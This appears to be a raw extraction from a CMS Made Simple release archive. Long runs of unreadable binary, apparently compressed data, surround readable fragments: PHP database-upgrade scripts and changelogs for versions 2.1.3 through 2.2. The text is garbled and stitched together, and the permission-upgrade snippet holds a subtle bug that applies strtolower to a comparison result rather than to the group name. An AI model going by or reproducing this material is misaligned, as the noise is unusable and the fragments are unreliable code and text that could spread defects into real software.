�#� :��#�f#�^��A��L�Q�	��^p���)R�k��P�4�8BkCd�[�g� s'Ge�OS\qDY���ߤT�4�yJ�@�স���{F*��%ˮk$�dr�!�Z�I:�w�){k.���(�]��i0���ݲ�T����/ȣ�!@�Ґ�&_�@�j�
��h7�
�B����d�Β
.@L{��y�4-����B���b3{ob�T.���ƈ^�O�^��!aZ���Z��3 3�Lz���Q�Cs��6�WS�	yd�(_N3��u�ƥX#zA�q�i����1�S����E����K�0�
��*{hI�)�B�nr'��b�C�Cu�/��,�Y�,���>����ez���.�l����m��<B]��>-�&���Ny�<%�>���:���fII⠘���9O��Q�3�j�7$�:3�gΤAK� ��L��SU%�6t�>�H��'סi&Q�:�sC�8��1�B:�#P�x$����>��Ձ.&��i>ޭ t��n�J��C^�HN��Z^[�'�ɒ��r�	����m�s��T�����V ~�	@�ȉ�~���?�T��1��{8�`���rM{w���{;
��]4)t�Q7A���d��f�/F鍑C�t��
��pi�P������T�W�U����L���z~�+gy%��E���h�r<�FGl����� AK�H
 ��AѬ�O�����ve�xP�S ��"5�!=��"�ud�i����<��vjk���E�_fc��$��ud2���P���N����/� j���,h�f� S�4q��<
��NX����ա���w��
��^*	F��>^����|uȭ��ᘭ"�aĒDI'sU!��#�����sU6w[ ?@ڣf�즮�9i��+`Ⱦ_���Q�2S�n`��h��
K�1}��J��ұC��m�.�[���cZ3�G��1�ۖd̊�t�X��1�P���V��+�����!��DW.��)+WWH��.��mM��ZHh�Nf����n,itFOV�d"�Q��w�`g�-!���-��O�@��d��y�i�j�e�GqJ���ϊF.�>��ug=�+��l`�;���C�4�_4	�Z�ܪ���A�������۶������A���ծD)�
�1�PM�4��	��{f�������Ḻ������!(�gK�e��uv&:��G�G�?��މ���2����W���ٺ���6�@��6��B41���X��H��4�x(��>#�
p��s��}�4��H�r�s��;��b�8�ـ,(��So�"�����wOE��S�N7��Z���f�=�E�I!-K��:�"�A����hW�3n���H"`�l�b�S NYe]*<\y��B�/�4�) 24�W3
,�UнLP|��0�=<���� C�Bq�b� 6�M�ta�^5}��O�v�p7�[��fD��s�ID��[
,d9���)7��=g��%�����G�Ҵw�Cܚ���}�+�<�Ì�^�E�����6�nr-����O��2�}�ḿL��x��V��'V�G<��Qw�������X7�V�QR�����c}����Q4��
J"RU\H�	���y�cX�@0U˝Z�(`�23�{�{����kZ/���7`�䜸 �Ƭ(+(���4�w���GG�j���2a�w�G�
�c����Վo���-��:�[4H�������
��\D5ϵ�:����a�^�9�4tE��s-&�}�|gH�ޭ��A���ش�u��
��g�Hˆ%��R6\�rư���%0�D�4(64��z�4H�6��[kG9sXZ^-=1�̳��v[��}��\	�$ <r|��"��ѻD�`���bߴ��oy�L���A��*?e�y�MCeM
\d�����/�)b5�7ݬ�L�n�\�T��U����&��ޮՑ�]�\�J�{":�jN����M��j�
({%SN�ě�K���ہ�� :��[�j��$T����c�פ��7z�2|Z�|T��O2eo�MXC��]9m"t����5g��~��3^a��e+Hv6�w�Z��S�?��9�-'n��/ �m��%�����w�J6"b>��&�BPѶ~~��%ݭ���`
<r��E[�K���bwvH���v~
�g��z�\��F��L-!�u�>y�A��LM���e'�2��D�\����[UukA�g�m-��
��SW
��qNJIn���(����ɧPX�/P_���9�Wo����_��CI��BG�@�4��f��ܢ{�tH��WwBs�X(ͮ{���J�%�P�nr��L{'� )�܂_[r�"u��(D��S'�^k�g7�@�i����-4��vD�+�����8�թƿ��r�2���FVQjgK�H}��~��P�1�n�K�i�˾#�9��!Hm�0^�	�\�/�u��P7ߒ��R*�tv
�V���C?���
�g������*r^TA�;Ȫ�4Tm�>m�?�]��N���&i�����qܴ='�x�E�p�\�Ɣ6�D�h��s����ب���܍K��8H	/%jJ1j	8���Ƃz��'��Fی�K��*h�Ƀc]dS&�⩣=%���ެ�'����n�-t�<�n�L��lɣ �:����:��]I:���O��0j���M�G	�?cw�X��(��u�"�t���Bw{4���~ຸ�7/O�/��Nyh&a�2;�M���<U*��"7{��w�rYQS�<��*�uH��5Y�5����]6��$X+1�h]=J��K
���
�R�4�v1�D9��>�C��0�M����B��Z<,+�3
d)P'K*&
Nv
T�q�ݰE&�.п��-���ư�4Q�,�V�*C��4��J���nguXJ���;Ob�Uv�I"?����9�RW�\�gZΩ�9���kei� {E��,�M��W[�CQ�J�(Yt��-tA��Fw~�u7m�
�ܥX|�(�T�xL52eG��bejַ����r�Y6t�%���j�R���r���
��6+��/	�6%+��!*o�DI��5v�>�^�������̞�~�Q�@��#�ExF�n�.3�+^�a��TV��z����S�Y��D����5����`�/��h�l����p����L�3G���27l4(��x�DFz�����Aٟ/��bRI��d��fYO�¶.�؋%�Ӡ�;x���e�}�}�zY������>��m���mi�m�C�5��|�����^�����2KW����Tez
9YK�/��i%+����R/=�^�G�&�Q�&�>å�e��rL�
D8@�c�P�G�dd?2&��@�o,��m7��Ǡ7r�L�K���Ѣ��(���.�!�+�!�zi�#o�z�9C��� �!�U��s��!I�3=��{Sѿ-ea��
�O��PR��KSHҲ_`��t�9j����YH/[����oFY��|�E����ȶyˆ�`�d�p�IJ��bt��/R�<7�I�Ȋ��)p)^V�.��5�l�`�K$K&D�MC���1�i$���2��9�>��2�T��m���^�hmg���z�&�;]*HŒ��y��+���X�:5_�>(��ewV����*=6[rH|��p��h�� �&��#�fA�l�ԡ�H�o�F|�N
n�w�C^�>�[kst���|�۴l*�\"��rԡE夝��F��n������w����&��w��u��84����w����T�R�֍��x��zJ��Co6�K`��6��2��W[-ȣ��lB�Z�U�ʹ�K���Q�|/lc�
1�+�\,d�
��!2�:��p��dF�Q�����L)U,pQ�c��n
�GܬF�!�@f�R���l. ����3>�9:��E,K�@�����Y���̗�:���79?�
!�ʩ+۵Ee�C]���f™)���B�k�x���o�W�@�t{3��k1V�xH���C�P*^��Wk8�`K	��f/�7
�\W9*	u�T��"�lL�s����B^Ō�n��E_��<��"�!����IP&D&�Ii�_B����p�ɲ�L��ZG
r�8]z�Qv�i����>�l*�y+h,t��+e\���3:�qy�QP6���'ԄF��E�5��򆙷}�+���nx�^,yHAu��Ͱ��Т��@>��x����}�����
��)HWH
L-[�<�ezo�fQ4��"%�E�&3�]ftz�|'���j�E�78��+xLF�F�,W��%���r}���-
M���ڔ�*6_|m�3Bf��p�b@�����*����gqC=�+{S零��3��1�R��V�@�!���1���=��na��R����dGF�M6�7����~�0��ޢF��l���J)М,��k����=��p������ӰP�Y�54��`����.F(��9o�9�ܵ�Fs�)���ӡAN$��
Z{�y�-����MY�.�|X�A5{ǥ���N����`ѝd��6r��e83Gt��@�\\�`
t�8��mrz� Ct��i�r�^�-��?���d�UA�2��M9Qv�zȲt�B�}�3�m����F�(,�$�;���ǣ��&�Q�;^"�|��<�<�R7&�~�W�����N>��G�����c
x�Cg2��o���߯���.1W�#��v�d�*P%��F��~��C�]
� ��Ѳ� w�ho`Z���yx@�9��X�ߖ4���K���i�P9���lqE���Vi0G�~�����[H���CQ���a~sAr?�L�-�風q�z��G��]I^��9�A���ʮ��KL,�R��`���օj=�d����#�3����ľ\���
�Nw9��4�:Z�L��)#\��^��8Z��b3#2�P�A�4(��_�L|g��RO,�9C|Z����/�_J��z�W�d�Q �.{!#�ج��e��
e�n�)�]��+z���N��L-Y�� ��֯�U��]rJs�
r�F�����VПu}��Q����=��9�Jn�TK�^�x|q(�@�r6����"�c���/)O�����X��d������	�H�"t�om��ⷱ�oY�6��M�r�\��InS�a�pm0jX���ǰ��r�T%��!�ޜ:����G�3 ��{�6�1(�Y��0<���ܕ�a�\��0��'�X��2w5!�V��K�jV!0��Yb
�C��Ѝ��(��,1�:HrRi=8f��rV�y�y�ݫc� ��������΃����*�=2���͝�z��-����J�\jl�7������r&G�7y�pI��9˲��u%�g2��o~C��
Rv�:���b6;��i��(Tko��x3_o��%�N,9l-�IU�[�$ă��.��s�!��r^,�}ůN�
�t�i�[�BJr�M�+8A���X���ڴ���!�u��؍�[���Ꚑ:��O,j+��e}0Wxt�VC���U���J�S#0�7���Z�G�5(8=�\��ߝ�l�T�;T�j��:תYU�\��g��ij�{��>X�E�V� ���>�ʙU���ˮL����>�h%1e��"sF���x����~:~W�K�`��H�A&�z�:�R�t�Y���jb��.Uo��aYxF��Re�Û�$��-U�A�(���Hmv���0u���r��9ܲ�Hs�N%�"43�g�-�aF��J��tK�n��GoX+�ʟᏱ�^|S�$�N�����1u��������
��K z�ڛU�S��xX�?<-J�[n��(17�)��nWH�
u�]JA��7=������[�Q�m��P���t~Q��	��Ƹ�ғ1�����uRj2�|����pù��"�!;�삌vMh�H!?��a�����t]�JK	�#��p��bk~K׃r�O�����#��u�L�قd��w�u�����K��G5s�r��[���y�%S#��VC'Ͻl��KU-��0~��"Pw�E#'�J$�߅�
�# �A�ѿ�d"��ѐ�����
M��goG��m�:i��w�٬��
 ����<����η���?^��ƲB�!�����D�F��s.O0�x�݇�aì�w�*�����V��Uz������
g���
��r���JI�#A���
o�?Bk�><:z89PY��*�D�����?~~����\�*K
�I�M�ȀIy�E���WO7��VЧk%�oR{i;8��*1:�D�*w+W���Ӭ#���W�xZ
P�2k[�V����i �}B�~�1ಆ�e
�[���Un�t|���%�GvJ&��
;&Ioֈ�R7/rȅY%N��:�3�p�T�QV�mZA����A�P�'�?p��.�[��t
�̫!}�j��܋w��Z:>���o�?hِ�y��u�r!T�t���t9߭\����fѳ^,��n��զ�,W�`ĥ��]�yJ�>�7��m���Qs!ӪWS��'Z��t��w#��6�;d1U�4d¬5���7s�'��V�(W?���%:g�<w��)S�f�x�T��Uų���<[�"I. ����@��!3�/�k ���ގݲ������/�G����aM(��#�ƽ�d`��썐ݼV�R`%��)E�F)�d��ka��^Dܖf�WV�����́b�*ם
AN\؍���5�M)F���'�Ce�
��H�Ʀ���k�g���o�9TVA|3��3�nS���fk������`��V��i�'�:�$�9QCU��W�9y~�#(��ӫu�^��X�~�v�S�"���8��%����t�Ð�v��m"tC]��j�q"JZ��gs�Cx��U��j���9�E�h2!U���U������������{+zP�<փ�[W4��|�\�qc�v�)��&9����:�X�'��|�<�oړ5�$��V>o�K�%y5�
��ko�E�~�Z]���+�����97mڬ�"\�шF���n��c ���=
��P.�&������p�vܨ�s��������ܛ)_�T ;T!�#����C�7�7ۘ�e��W�ީ
A�L�,;���0v��}|�BT
��EBz��]�r:̟@�w�=�@�ր�cDuHrTO.pe9�xX��=�J(
��%����A���&���M�>؃
='Pk�(Q��<U�bT"ӲR6��~rl�"��y )tm�KU�\,�AM�";q�{���gG[��z,bwӢlds�$�A��q�G��˲�k�z�������5+�&ŽS1��a)�𾁣�;픭MH�@�$r:�+�+K���2ɶݷmH�m�*�%X��I^p�g7�vڷ���z�Ԉ�ȋ�k���B��mo�z�(@�t��2ξ�� FAxY@��STG+��m 8(v*T�u�5(�ӽ�#0xԶt42H�=9�ut���� w�5Y��z��o�*R�r��֔d�N����V�-ܧ��߷���X׋%y���B���&x�b����}�I�(.&�x`3�a)��{`�qR�㠣��'u0h��HYYE�����n&���ߊB϶wf��Fn,�� �e�$��"<���:0�ͬ;����v����zqu�{UYxi�A�>�!��<�#;xO����ʕ�uq~�����=�C�򈐬G4O��ꇏ�+A���b�ܳ%����L��F#�dM+V�k���n�4T�����'ѡ����U�
@��n!��i�W��wa�
^R��^:\г1u��Tu���ҩL��Z����r���pܔɣ��QE.�!=�޼X��e���\C�.>��qFF%�ib���b^�1�{�䞤�ɥ��-�38n���k���-��~������>����r=�4��t���߮}=C�����L�'���b�d�%���=j��<�`T�g��Z(ڦ��Q�nT��rH���-YT'ec���y�VA���l�̌_�$`�+�&Wk��ARUy���Y�os��9�շ�O��L��<u��p�˰&�!�x�����-��'dT�����o��
cO�&�mi�,	�j��Σ�/�A�;Ty;��qH���P�����	*���SU��'(>Y�@��'W^���֜�	t�p�rz48��Y\0�`Tbt,���sV�wP�Lm��ߍ�]���S�!j���x���G�E�(���C@���#P��b����y�p<��շ��g�YT"�w�3�F&��6��g��sN�*7ٹ�g5/	F����!HX��1�
�H���ܒ�d؝��f��^),�Q�e��F�9��J�e���eo��pD��i������>�,� +yE&�"Ҵ�ܶ珮�5�=��"����G� l�lx�zS����O�ݙ���"A�,‘['t\�%�i�����2N�wr)��<�����P�>2T9�(/��b��;ٞ�ؑ�I���@Gy�Е&��'��͗Ņa�)�t���N�G����J��
��m8����/��s^��W5�g�
�O��n�	��o�=V���L�~�*g�lfY.MV��h
X��8�G�١)}Fj��l}���$o��(�LG�X[�I��N2�q8�-�����ʹ����8ռ�.լ��)%�Q��x�#Nf��q�9f>�Pfaid=r�<�fu�Y
d'7�O5����,"!Xft�U#��m.�b�T�ypT�ђ�A�6�]ʮ���
������G�:�'*K�к@�k�����_1���Y�4��%[�����Z.�%���&���lT�jlT\C
x(�,7�%`G*n�y?��(ovu:[�>X��:�Xt��j>^f�kq'�k*����j���5�t]q��<�_/��;s���;Y��}H�]5��i]��g��ٕ��${�����|����w�?^]����A��QE'����(� ov��3B��?,�i�
��҅�-!��lESQ�f��u�ny���	��_e�=��lA�<W�5^�n�+}�B�R@�5�1��4�YIРHȦ��{8r�)_[RH��թd:��k�O�ߝ�MrUXoH[���&��C%'�|��;�ؑ�СQQ���UKב�	9�2Rc:��ё��U�郜M3Gj��ER�r���f���Yך�r* �$oO%���r�~ɍ�i�����?�F�
{�
Y啑�2J8
�����<���#%�d7%7�x�c�ut�?��?,v;$ʉm�LtY�B�ނG��HO�_s�;���8Y�/'��7��j+*|���n���:Y��&�k���as;v����vfGG��.j��Z2R��7)t�*9�z°
�Ҵڼ3g|q)Jt�Q�b���GǎdV�޽UС����\(
|JB=<rp�w���G�Ō������mM�j�_�G����|�R���zy�ՔҚ\��A��T��X�7�ѻ3
����֫�QUU���kѫ9>�}�
�<�s�m�9p �l15�v9�;��N��e���~�q�G��h6�\U ��n� ���4j�$��_g?���ŹHW>�B��z�T k;�%w|�g���3&���*"��)�Mr�DF+�pS�N�������l@�x��8�;Q�~�/%d��N������lC�V^=M�0'���aߑ��!���Ҿa�=����=[����1T�O�;_��qx�;C�!.�C$�TF��1
�/���ݞf��F����vK��&lvM�Z��bL|�&���1����*�}��ʝe�/���s'I�"�<?php
$gCms = cmsms();
$dbdict = NewDataDictionary($db);
$taboptarray = array('mysql' => 'TYPE=MyISAM');

status_msg('performing database changes for CMSMS 2.1.2');
verbose_msg('database schema has not changed');

$sqlarray = $dbdict->AlterColumnSQL(CMS_DB_PREFIX.'content_props','content X2');
$return = $dbdict->ExecuteSQLArray($sqlarray);

verbose_msg('ensuring that database schema is set to 201');
$query = 'UPDATE '.CMS_DB_PREFIX.'version SET version = 201';
$db->Execute($query);
Version 2.1.3 - Black Point
----------------------------------
Core - General
  - Security fix to prevent HTTP_HOST attacks. Many thanks to I-TRACING (www.i-tracing.com) for reporting it!!
  - Remove stub .htaccess files from subdirectories
  - Update the included sample htaccess.txt file for security
  - Fix for endless loop when calculating a page alias in utf-8 environments
  - Fix for endless loop when calculating a page alias and a page name/title ended with -
  - Fixes a notice on the login page
  - Optimize LoadContentFromId() to be typesafe, and use default page, if the id passed in is invalid
  - Fix error condition if there were no default default design, or default page template
  - Fix problem with system verification.

  - #10825 - Admin-account settings don't remember startpage if you set one
  - #10874 - When creating a page and the title has specific characters, CMSMS stops responding
  - #10910 - content and content_module order incorrect Admin page
  - #10911 - 'Use Admin Search' permission not being used in 2.1.2
  - #10921 - Content Field to Display in Name Column not used

AdminSearch v1.0.1
  - Minor fix to permissions checks.

Navigator v1.0.3
  - Improved exception handling on install

News v2.50.5
  - Fix error condition if no results were returned

Installation Assistant v1.0.3.1
  - Tweaks to README files
  - Improved error handling in some circumstances
  - Fix some PHP7 issues.

FileManager
  - #10871 - Filemanager moving folder
��V�RG}�+��Hs��&�Re�A$�7���Gly������.`���ʋ�3�s�v��\�.?OnN?�/�ף��٩vA%�C�'��?\_]��9��|��<;5=0{//G�ӟ�7W/��/^m�~�~;�:of����X̟���F"T�^1h�s�.�D6gm���W�v�
w= r�=G��0�B*l��h�`64��O���]M��s��?�.?n��xt�vN>��X�[mK���f6�;�o��~��[<�H�#*���hm%&�� ��M��)���l�|O�\2E)�u$��S�&�O��+��%WK�1
�O��\�`=����;��y9�v�1x1��ò�0��M��u�6��o&���,{_�V�Ke`��"9�f�諎��/��л�İ�>a��oM�`J�.��Ԡ�!�\����B﷋W����&�cʡHyLR`�)Y�#�}w+&j3��\�:�V�����4�]�R����w��κ��!TG���	�������[�_�5%���:+��Xr�����%�T�ZKp1م|���K���J�9d/]"�Z|��$R��8�v�_�=�٠��k�R��
��RZ��Q:�h�?�3_�>�#(��JYo0��XS�U��6��sZ���Ѻi'K�{�<ؾ�Ok�.(�ʈP�
E�d�E`v:�}�]3�]����|�h��}�
����Š_�/���
oD�BV&�jg%�'���/�0�yv��䀐�
T��l���
{�|�/@/�{3�~��s7'�L�C��*�0�D��$E���I�����ӑ���J���1����\C��Cv����c�s,+!A�bs$%Ӄm��:�E��ft�n���D�)���E�)Z�!A���Ar��]��e���S�m�����߿�ҲY+���mv��u�>�[,��e$�ɦl\�e���ț�mw�{�j��QQs�>�)�6j�Z}Mur�bV�t��}I"i�d�XUt�Q����蛶��wk!�6��D1�D���������F׃��n^O�L�4�U����j��"@r:�WVMK;�}�"�-Z^�^k�F�� K(W[^Ã�b�����|���z^؃�)9���X+$�� �^�Z�U�����%77���
op>�L�}!TEU˥$�P"�DInCUv�s�؍�f֜���w�Ň���ZC5H�L���z�^��Y{���u���7C�t�e`*��:��m�x'���|���89�,H2e�*F9�I��cM��7%ڞ���4V��Version 2.1.4 - FreeTown
----------------------------------
Core - General
  - Fix to the clear_cached_file() method which should fix problems with module installation.
  - Minor tweak to distributed sample htaccess.txt file

Phar Installer
  - Fixes issues with respect to hanging on step7 when suhosin PHP addon was installed.
  - Minor PHP7 Fixes.
��W�rI��+�C�	��mw�%{D���H$��pqV�=��7�HIѡ�����%���zt������f|;�_]^h��&xw������o'����0=0GoF��ˋ�7������b����Ɵ�b����"��z��Q;���%�b���yg�^�,�p��#w��FX��i3������t@tٓ��s�ͅ��6�E�2k�Cz`�֭g����%"������NE���;k2PT�[����(��mz�����}Y5��������A3��f�"oR`2�T6�K4�f	��R�f6x�b~�f����@]2Y):��S�&���b�]>>�Y�\�K�s0�U��9z>O-vw��A^,��p�m�1�Q��&]],�sT*$o*&Kl���n�\�����j�Qb�V9`�)��f��j���d"��������.چ�̀��e_��b�ֹ2r�%���9���K^a/��^K�P
�(�{kj	&p18ʹ�N�����r�~w�*�b6��DcL���$�&�*��fݽ����	9lRm�O��Iz��R��RAu�l;��[�E\(����YL(ͭɫ�Ϲ�C�u^SҺ��AaP���ڊ���S�b�
�ד}�+���9���t{tVU���6�h���"�J�g�'�����YG��]b/��rJ���@JW�ӟ��_>#���+mX[d
�o��Ɋ��U�S$�5E+e�H�)Hk']���lQ֭�y�Q�	�^������Fg�Lf�B0*r�E��9��⮙ίq�S^
{�-[��~���j�_�<��
�D�(\т1#*�~a��t��?&'t.X�I�R�l��b��I�@o��f��b5�q��(¸�Ƕ=U-B����I,m�R��|�p�י̮��
�I�5dI8V�?��ﻏ3`�����X�f�4iQ2�{�<Cڴ�`_��.�2��tl֨�v>� G+Mw�W���m�����L�+qQ��\+�&��G�g����	�ro��R��-)� ��Q~���4�`fc��3F�sA��bU�s�O�Ec�Oߴ�1�ۀx��6�C�H�	��ɾ�;]]�����vp�ﻣ vҔVy�
���DDى�5��nڲ=�����v�dd���bɞg�kx�\�7?pU���.��$���,O"�Uv
قe�K����+��s���
�[��i�\����W��.�Ud*;���}@s�~�6��%Z&$�l�
����,X�l>~�*5���kѲ��$����Z恤x3Gd�
��,ؓ,<ËPE�Vt�d�$Dv��b�F��+x<=�ps��nI�^��,��T�ʲ�2��$����o���	�Up�l�$GNi�c!�PXCE�8w>�APYg)̒��3�C0o��?�½����1)Version 2.1.5 - High Rock
----------------------------------
Core - General
  - Fix fatal error if an extcss stylesheet was placed in the Admin theme.
  - Another minor fix to clearing cached files.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
  - Fixes an issue where a 404 handler error page would not be rendered correctly if for some reason the route did not specify a page id to load.
  - More fixes to cms_url class.
  - Improve the way page aliases are munged when they are supplied.
  - Improve the error generated when a page alias cannot be generated.
  - Minor fixes to the form_start plugin.
  - Minor fixes to generation of moduleinfo.ini.
  - Fix an error message in the autorefresh JavaScript class.
  - Fix problems that could result in uid=1 becoming inactive, and not a member of other groups when edited by another user.
  - Fix query problem in CmsLayoutStylesheetQuery with Mysql 5.7.

  - #11080 - Parameter $adding in GetContentBlockFieldInput always FALSE.
  - #11093 - Bad error message in jquery.cmsms_autorefresh.js.

Content Manager
  - Improve error handling in Edit Content.
  - Fix a problem with the call to GetTabElements.

Design Manager
  - Fix problem with resetting a template back to factory defaults, or creating a new template from factory defaults.

Module Manager
  - Improve the way modules with dependencies are installed and upgraded. (Got rid of the queue stuff).

AdminSearch
  - Use 'Manage Stylesheets' permission, not 'Modify Stylesheets' when searching stylesheets.

Phar Installer
  - Adds missing 'Manage Stylesheets' permission that would not be created on upgrade from 1.12.
��W�n�V}����w_�N20N�8S�O�%����T�M����$^�d����R��9�������������@/ep:��˟�nǃ?��&_oo.j(������b�r��~{pi{��j�0�[�?|�ry�jpq1H*�T
S!�D�.�b��R����Z�:��j�Vݺ�fح�}0�Ng�Q��e���-Š"�=�g���jJa��R;���)f2A�|jX�F��~���XI1Y��X�K*�*YP����� �Y�h�ǚ�A��ʹ�ڸ\��%'e J~!%����J�E�i|�k�G�(^9-q�S
��!�3�>��'5m�\?o�A%�:G�c1�x'(s�"??�kh[����㼽\����t�BO^�^�$lq!�s`y�N�Pէ��ʚH.Z]�S(5ƀ"�T�T��Zt�,�~Is��uM_ey�2�0�&+,�RVPȪ��w�Ǔ���qBy�T���˺ʏ�ab�>�`��EJ ,<�g�ғw��:�Z;��XɭCL¹�`9��ר�o�7x\��I�����cM�I�<!ѓ�2	����>DMR���7��5Dӽ䏐+��ӆ���Z���A$��\��ɶ���"!�F, ��l`��cƼW�����FH&itH�*]��R�ч��/�'��7hOe�FV �'瓊�?V���k�O[�&�4��p�ŋ'8��1��	�������|SηY��K#	�X�<ˌ�p��7h�n�Ӓ�+)�����B8m��L3���0������G�;��ݲ��0o�?���/PfFe���A(�^��y�}����a�ow��hX�YԅFQXNJ²�B,��Aؖ�m�1!h������Ns�N�~�"��:2R�#'4g�\���P���;޵�D/�3@;����B���C��<O;��a3jF�{7�5�4o���0cC�6�Ub�a���Q�ڿ��̙�IƊb��$�$C�<'I�f�a���f��罛xc	�[�J�
7dh����AO�3�W'Y��$	���H^/�E�dqV�w+hO^6�m�~s��&<^��U6ҳ�)c������O�u�ވ�{���҉6[�E@�b���{��aP٠��Ȼ��g�:�-�ȣjLě���WČɿ��cLt��Z����ٹ��l7�h�KیҺ�q�9m��W��{iy�T�lPQ9�Q6��e2��ՈǧT3�Hu�F��1�)l����Qi(ҞC�p�?x��<���'�Ϥ,�IJ`�ֲ#*IfK�U����QY/��*�f>� �v�/��v��Go�p ����r��%���s9�W��F�����ë����$�� �k�y�Q&H�o����w�3N��a�F��4;#:kyy)BJg:?p�����I���Hd����n�x�y5b�)�+�/�����(�
<?php
status_msg('Adding missing permissions');

$perms = [ 'Manage Stylesheets' ];
$all_perms = array();
foreach( $perms as $one_perm ) {
    try {
       $permission = new CmsPermission();
       $permission->source = 'Core';
       $permission->name = $one_perm;
       $permission->text = $one_perm;
       $permission->save();
       $all_perms[$one_perm] = $permission;
    }
    catch( \Exception $e ) {
       // if it already exists, skip adding it to groups
       verbose_msg("Permission $one_perm already exists");
    }
}

$groups = Group::load_all();
foreach( $groups as $group ) {
    if( strtolower($group->name == 'designer') ) $group->GrantPermission('Manage Stylesheets');
}
Version 2.1.6 - Spanish Wells
----------------------------------
Core - General
  - Now attempt to detect if a template name passed into CmsModule::GetTemplateResource() is already a resource string.
  - endswith is now an accepted function in Smarty templates (fixes typo in security policy).
  - Fixes for CmsNlsOperations when using a language detector.
  - Fixes warnings in useroperations.
  - Fixes problem with cms_selflink dir='up' since 2013.
  - Modifies the OneEleven theme to set the meta referrer attribute for security purposes.
  - Modifies the functionality of the CSRF tokens to be more secure (only set the cookie in one location, only set the session variable from the cookie).
  - Increase Admin users list limit.
  - Reduce time limit for daily version check to 3 seconds.
  - cleanValues in Admin log and List Content.
  - #11198 - Fixes problem with cms_selflink with aliases that starts with a numeric sign.
  - Change new version check to timeout after 3 seconds..
  - minor fix to the relative_time plugin.
  - Admin menu item urls can now be built from the remaining members of the object, if not specified.
  - {content_image} and {content_module} now preserve order properly and support the priority attribute.

Content Manager v1.1.4
  - Fix bulk set-non-cachable functionality.
  - Fix a bug wrt content blocks and the adding flag.

Installation Assistant v1.0.4
  - Adds recommended check for ZipArchive.
  - Improves method of determining a temp directory.

ModuleManager v2.0.5
  - Improves functionality if ModuleRepository is not available.

News v2.50.6
  - Minor fix to editing news articles from the Admin interface.
��W�r�F}�������<ce2U���=�}S�р�
%�Dj������x�B�M�A88�g_~�]ߜ|�]̮�nf�'�%��I��?=���r~�������鉙���Ë�����e��r��������5�����Զ݇O?�]|��������I�:�`bL.*�U�J�ޙB]6�iGKꦗ+���d���zY[�-=�M�u�ڂBf6�ɲ͔�U��j)
s1���;�J��n��F���-8J�ZS撽%�
�m�~�Ѧ;�Щ�g9�d���6��#F�����Y�w�b�`�fT�x���슲�����U@!J���HgÑ$v�T�=檁wmSv���v�}s�ysD�#ﳄ�0Ւs���Gx��&a�����əb0TUsr�����
�m���:���Z�-Te1e]������N����|Zvmw��
��&�3K�\J�T�V�31Xpd���aφx�v��=�E���ze�Ԇudʁ���Y��YA�>�^|���U������\�rڸ$<TQk����C*$+�\/a��&�n�����m���$[�D@
�����2�Tӑ��p�p��(��I�K�C��!0Z,U�y'�sZm�H�’M�D��kvU�T��>j����J4�uێ('܊%*�D�P
g�I�2�$6��fЭ�ЍpE?�Q>W��<�	\̾@	������nJ����QQ2+���W���]�.�R�+;�z�Ӈ=�\~���{2��SQQ��Ԑ{�ޅ�.w���GV�a%Z���N*&;�Y,�m���#�+*+��KJ���&��S����y����/���M��j�Ķ�l���$qH�"ۚC@|��Ko��ßi/�'���jU�I���Qd�����M�6��ЉhB1*�h���c`-����̌V&�7�>t`%B����+�
%a��|M��xS�����26�I:�5�z'$~3_Un�=��9�v�F%l
�p�R`A:/�׶rv�Y��?�?u�G'�U�C�R5"�������.mIf�H�L��O&��$Bt!Jw3<WI���YD,������{
�!��ǘ�SN(S���z\�:2�F�ǘ��S�/�s�c
Rɑ%�
l��ځ��`����jvv>���ןϮ&7����C�h
IɦdȰ ��
��7��P���#Is�����`'�.l3Tɗz,�7�v�ņZzC�k�"�Py_�T��R�!�R5�,���?��`S���f���#Zy���}R
9�c�F�����
nn��6{��-��F�Xg�xe����|��ڮ��l85GI{�Z�")E$��T�6=��{\vO�1�PD�e��.��E���<?�v+r7��F
HR%3�7Z��r�y�02�j�����%oM(��a��9�A>�pƎZn����uv~�ф)�[B��3>��Vh����]�n��b��B�>}!M��n&���K~���De���OH=~^$wuK�G�P��U>�d)��YY9��T���&ɰK?��o���/�	JVersion 2.2 - Canada
----------------------------------
Core - General
  - Automatically turn on file locking for cached files to attempt to mitigate race conditions.
    NOTE:  On systems using archaic filesystems such as FAT and FAT32 CMSMS may no longer operate.
  - cms_filecache_driver now caches for 2 hours by default and has an improved cooperative locking test
  - Implement new database abstraction library that is compatible with (functionality wise) but improves upon adodb-lite.
  - Implement protocol-less URL's in the config.
  - Page tabs are now focusable (you can tab through page tabs and use enter to select one).
  - Minor fix to the {form_start} plugin.
  - Minor change to the {admin_icon} plugin (default image class).
  - Cache more items that are queried from the database, to reduce mysql load.
  - Minor change to tree operations functionality to reduce memory usage.
  - Fixed problem with order of content blocks when using {content_module} stuff.
  - Adds get_usage_string and the concept of a type assistant to template types.
  - Minor change to auto-alias determination routine.
  - Detect module_custom enhancements in the CmsModuleInfo stuff.
  - Refactor Admin authentication.
  - More fixes to the cms_url class.
  - Optimize the include.php file.
  - Adds built-in asynchronous task processing system.
  - Adds the ability to reduce redundant mentions in the Admin log (runs asynchronously).
  - Refactor the Admin log page to allow for better filtering and pagination.
  - Admin log now uses cms_date_format and cleans output.
  - Notification functions in the CmsAdminThemeBase function are now just stubs and do nothing. Will be removed at a later date.
  - Removed the GetNotificationOutput() method from the module API.
  - Adds classes for creating Alerts. This is much more advanced than the old Notifications system.
  - Minor accessibility tweaks to the OneEleven theme.
  - Fix numerous minor problems with the OneEleven theme.
  - Refactored the OneEleven Admin theme to use new Alerts classes instead of old Notifications.
  - Refactor the OneEleven Admin theme to display an alert icon in the shortcut bar, instead of in the navigation area.
  - Fixed sidenav in the one OneEleven theme now works properly. If sidenav is larger than viewport then don't use fixed... easy.
  - In OneEleven Now revert to small sidebar navigation (still floating) if screen is too narrow.
  - Removed notification settings from MyAccount and Global Settings.
  - Removed pseudocron granularity preferences.
  - cms_alert() and the new cms_confirm() JavaScript functions now return promises.
  - Revises much code to use cms_alert and cms_confirm() instead of the standard, but browser specific functions.
  - Fixes to the cache clearing methodology.
  - No longer check for duplicate content blocks in templates... NEEDS TESTING
  - New core events: ContentPreRender, LostPassword, LostPasswordReset, StylesheetPostRender.
  - Fix problem with the default parameter to the {content} tag.
  - Fix problem with the use_smartycache thing in system information.
  - Fix notice in useroperations.
  - Fixes problems where all files (including dot files) had to be writable before creating a module XML file.
  - Fixes minor notice in user operations.
  - Fixes for namespaced modules.
  - Fixes an issue in CmsLayoutTemplate when creating a template from a type.
